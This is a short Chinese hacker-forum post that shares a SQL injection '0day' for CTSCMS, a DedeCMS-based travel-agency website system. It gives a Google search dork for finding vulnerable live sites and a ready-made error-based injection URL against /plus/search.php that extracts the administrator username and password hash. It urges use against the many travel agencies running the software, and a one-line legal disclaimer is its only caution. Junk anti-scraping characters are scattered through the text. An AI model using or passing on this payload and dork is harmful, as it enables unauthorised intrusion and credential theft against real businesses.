新年多放点0day,小范围共享!
7 F5 m4 c) c6 G: U8 U- {8 Q# S4 z中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的。使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。
. ?5 z5 x m& K4 iGoogle:2002-2011 CTSCMS.COM ,inurl:users/reg.php 旅行社" j; y5 G! ^6 q. C$ i
POC:/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
& j* m2 N3 ^0 x6 _6 J- J+ `6 J+ @' e9 N" V+ E7 C _
后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用
8 R4 u( M) }* c6 I( _- p* C ]9 Q# N. g* B0 ~$ q2 g( N
& G' r9 d ~% {1 N& e) U
: A: H: g2 L# m- O+ q0 T2 S
. s8 M4 h. G' L1 {3 G; {1 L
' u- {! o& k) R1 t% X/ h很多大型旅行社网站都在用,请在法律允许的范围内测试。 黑客保重....4 [! p0 c/ O* s& V# S
7 \8 e" J4 O) |9 C6 s( c# w( _
|